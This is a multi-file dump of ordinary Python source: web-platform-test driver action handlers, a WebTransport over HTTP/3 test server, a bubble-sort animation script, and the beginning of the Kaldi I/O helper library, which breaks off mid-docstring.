def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class SetPermissionAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
permission_params = payload["permission_params"]
descriptor = permission_params["descriptor"]
name = descriptor["name"]
state = permission_params["state"]
one_realm = permission_params.get("oneRealm", False)
self.logger.debug("Setting permission %s to %s, oneRealm=%s" % (name, state, one_realm))
self.protocol.set_permission.set_permission(name, state, one_realm)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
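
# A minimal sketch (not part of wptrunner) of how a new testdriver action
# plugs into CallbackHandler above: an action object is constructed with
# (logger, protocol), is called with the JSON payload, and is registered by
# name in CallbackHandler.actions. The "refresh" action name and the
# protocol.refresh part used here are hypothetical and only illustrate the
# pattern used by the action classes above.
#
#     class RefreshAction(object):
#         def __init__(self, logger, protocol):
#             self.logger = logger
#             self.protocol = protocol
#
#         def __call__(self, payload):
#             self.logger.debug("Refreshing the test window")
#             return self.protocol.refresh.refresh()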
|
webtransport_h3_server.py
|
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import stream_is_unidirectional # type: ignore
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
class H3ConnectionWithDatagram04(H3Connection):
"""
    An H3Connection subclass, to make it work with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
"Unimplemented capsule type: {}".format(capsule.type))
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
                WEBTRANSPORT_FORMAT_TYPE = 0xff7c00
                if format_type != WEBTRANSPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except IOError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
        # Use a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warn(
"Sending a datagram while that's now allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
            # TODO(yutakahirano): Make sure this is the correct logic.
            # Chrome always uses 0 for the initial stream and the initial flow
            # ID, so we cannot check the correctness with it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warn(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
    A WebTransport over HTTP/3 server for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check whether the WebTransport over HTTP/3 server is running at the given
`host` and `port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
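# --- Illustrative usage sketch (not part of the original module). ---
# A minimal, assumed way to drive the server from a script; the certificate
# paths and handler directory below are placeholders, not files shipped with
# this module.
if __name__ == "__main__":
    server = WebTransportH3Server(host="127.0.0.1", port=4433,
                                  doc_root="./handlers",
                                  cert_path="cert.pem", key_path="key.pem",
                                  logger=None)
    server.start()
    if server_is_running("127.0.0.1", 4433, timeout=5.0):
        _logger.info("Server is up")
    server.stop()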
|
harness.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015, Jason L. Wright <jason@thought.net>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# implementation of visualized bubble sort
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import threading
import Queue
import copy
import random
import argparse
class SortHarness:
def __init__(self, sortfun, N):
self.sortfun = sortfun
self.theArray = range(N)
random.shuffle(self.theArray)
self.fig = plt.figure()
self.ax = plt.axes(xlim=(0, len(self.theArray)),
ylim=(0, len(self.theArray)))
self.line, = self.ax.plot([], [], 'ro')
self.resQueue = Queue.Queue(10)
self.aargs = {
'queue': self.resQueue,
'done': False
}
def plot_init(self):
self.line.set_data([], [])
return self.line,
def plot_update(self, num, aargs):
if aargs['done']:
return self.line,  # blit=True requires an iterable of artists even when done
q = aargs['queue']
a = q.get()
if a is None:
aargs['done'] = True
return self.line,
self.line.set_data(range(0, len(a)), a)
q.task_done()
return self.line,
# Runs in a worker thread; the instance is passed in explicitly via Thread(args=(self,)).
@staticmethod
def sort_thread(self):
self.sortfun(self.resQueue, self.theArray)
self.resQueue.put(None)
def go(self):
threads = []
t = threading.Thread(target=self.sort_thread, args=(self,))
t.daemon = True
threads.append(t)
[t.start() for t in threads]
ani = animation.FuncAnimation(self.fig, self.plot_update,
fargs=(self.aargs,),
init_func=self.plot_init, blit=True,
interval=10)
plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--len', type=int, help="length of array",
required=False, default=100)
args = parser.parse_args()
def do_bubble(q, a):
for j in range(len(a) - 1, -1, -1):
swapped = False
for i in range(0, j):
if a[i] <= a[i + 1]:
continue
a[i], a[i + 1] = a[i + 1], a[i]
q.put(copy.deepcopy(a))
swapped = True
if not swapped:
return
SortHarness(do_bubble, args.len).go()
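# --- Illustrative sketch (not part of the original script). ---
# Any sort routine with the same (queue, array) signature can be visualized by
# the harness; for example, a hypothetical selection sort could be swapped in
# for do_bubble like this:
#
#    def do_selection(q, a):
#        for i in range(len(a)):
#            m = min(range(i, len(a)), key=lambda k: a[k])
#            if m != i:
#                a[i], a[m] = a[m], a[i]
#                q.put(copy.deepcopy(a))
#
#    SortHarness(do_selection, args.len).go()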
|
kaldi_io.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2019 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
from __future__ import print_function
from __future__ import division
import numpy as np
import sys, os, re, gzip, struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To override it, run python with the env variable set, e.g. 'KALDI_ROOT=/some_dir python ...'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Optionally seeks to an offset if the 'file' argument contains a ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Optionally seek to the offset,
if offset != None: fd.seek(int(offset))
return fd
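# --- Illustrative examples of rxfilenames accepted above (paths are placeholders): ---
# open_or_fd('feats.ark')                  # plain file
# open_or_fd('feats.ark:1024')             # file with a byte offset to seek to
# open_or_fd('feats.ark.gz')               # gzipped file
# open_or_fd('ark:feats.ark')              # 'ark:'/'scp:' prefixes are stripped
# open_or_fd('copy-feats ark:- ark:- |')   # trailing '|' -> read from a command
# open_or_fd('| copy-feats ark:- ark:-')   # leading '|'  -> write to a command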
# based on '/usr/local/lib/python3.6/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match(r'^\S+$', key) is not None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='int32')
# Elements from int32 vector are stored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
